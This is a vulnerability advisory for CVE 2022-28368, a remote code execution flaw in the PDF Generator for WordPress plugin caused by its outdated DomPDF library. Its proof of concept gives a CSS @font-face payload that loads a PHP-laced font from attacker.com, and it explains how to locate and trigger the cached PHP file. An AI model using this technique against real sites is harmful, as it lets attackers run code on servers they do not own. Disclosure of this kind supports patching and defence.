PDF Generator for WordPress < 1.5.4 – Editor+ RCE | CVE 2022-28368

Description

The plugin uses an outdated version of the DomPDF library (1.0.2), which is known to be affected by multiple vulnerabilities. One of them could allow the editor and above roles to achieve RCE in single site setup.

Proof of Concept

v1.0.2 used: https://plugins.svn.wordpress.org/pdf-generator-for-wp/tags/1.5.3/package/lib/dompdf/vendor/dompdf/dompdf/VERSION

Generate a font with PHP code in the copyright field (https://www.glyphrstudio.com/app/ can be used for that), and host it remotely as a PHP file.

As an editor, create/edit a post and put the code below while in Code Editor mode:

<style>
@font-face {
    font-family:'font';
    src:url('http://attacker.com/font.php');
    font-weight:'normal';
    font-style:'normal';
}
</style>

Save the post, preview it, and click on the PDF icon.

The PHP file generated for the font will be located at http://blog.com/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/lib/fonts/font_normal_ b271daa9ae2c1c58d4a4ddbb1dd9eacb.php and will execute the PHP code

PS: The hashed part in the URL is the md5 of the font URL, ie md5('http://attacker.com/font.php') here